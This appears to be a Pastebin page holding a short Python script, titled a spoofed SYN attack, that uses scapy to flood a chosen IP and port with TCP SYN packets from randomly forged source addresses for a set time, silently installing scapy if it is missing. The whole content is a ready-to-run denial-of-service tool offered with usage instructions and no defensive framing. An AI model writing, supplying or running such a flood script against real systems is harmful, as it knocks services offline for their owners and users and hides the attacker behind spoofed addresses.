Advertisement
mem3_dump

Spoofed SYN attack (ssyn.py) (ZATAKAI)

Feb 17th, 2019
270
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.86 KB | None | 0 0
  1. try:
  2.     from scapy.all import *
  3. except:
  4.     import os
  5.     os.system('pip install scapy 1>/dev/null 2>/dev/null')
  6.     from scapy.all import *
  7. import sys
  8. import time
  9. import random
  10. try:
  11.     ip = sys.argv[1]
  12.     port = int(sys.argv[2])
  13.     timeout = float(sys.argv[3])
  14. except:
  15.     print("Usage: python {} <IP> <PORT> <TIME>".format(sys.argv[0]))
  16.     quit()
  17.  
  18. def DDOS(ip, port, timeout):
  19.     end = time.time() + float(timeout)
  20.     c = 0
  21.     while time.time() < end:
  22.         try:
  23.             source = str(random.randrange(1, 256)) + "." + str(random.randrange(1, 256)) + "." + str(random.randrange(1, 256)) + "." + str(random.randrange(1, 256))
  24.             netlayer = IP(src=source, dst=ip)
  25.             transp_layer = TCP(sport=6969, dport=port, flags="S")
  26.             send(netlayer/transp_layer, verbose=False)
  27.         except: pass
  28.         c += 1
  29.         sys.stdout.write('\r{} Packets sent'.format(c))
  30.         sys.stdout.flush()
  31. DDOS(ip, port, timeout)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement